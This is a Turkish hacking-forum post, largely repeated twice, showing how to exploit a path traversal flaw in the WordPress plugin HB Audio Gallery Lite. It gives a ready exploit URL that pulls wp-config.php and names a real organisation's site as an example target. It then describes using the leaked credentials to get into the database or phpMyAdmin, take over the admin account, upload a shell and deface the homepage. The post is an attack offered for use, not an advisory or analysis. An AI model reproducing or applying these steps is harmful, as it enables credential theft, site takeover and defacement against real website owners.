Bugün sizlere Wordpress Plugin HB Audio Gallery Lite açığını göstereceğim;
Google Dork:
Vuln Dosya: gallery/audio-download.php
Exploit: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
Örneğin;
frenchandindianwarfoundation.org/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
Config'i çektikten sonra ne yapacağınızı bilmiyorsanız ?
Nacivat yardımı ile sitenin veritabanına giriyoruz veya phpmyadmin'e girebilirseniz o da olur. Daha sonra veritabanından userleri buluyoruz ve admini giriyoruz. İşlem bu kadardır. daha sonrası shell ve index.
Google Dork:
Gizli içeriği görüntüleme kayıtlı kullanıcılar için mevcuttur!
Vuln Dosya: gallery/audio-download.php
Exploit: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
Örneğin;
frenchandindianwarfoundation.org/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
Config'i çektikten sonra ne yapacağınızı bilmiyorsanız ?
Nacivat yardımı ile sitenin veritabanına giriyoruz veya phpmyadmin'e girebilirseniz o da olur. Daha sonra veritabanından userleri buluyoruz ve admini giriyoruz. İşlem bu kadardır. daha sonrası shell ve index.
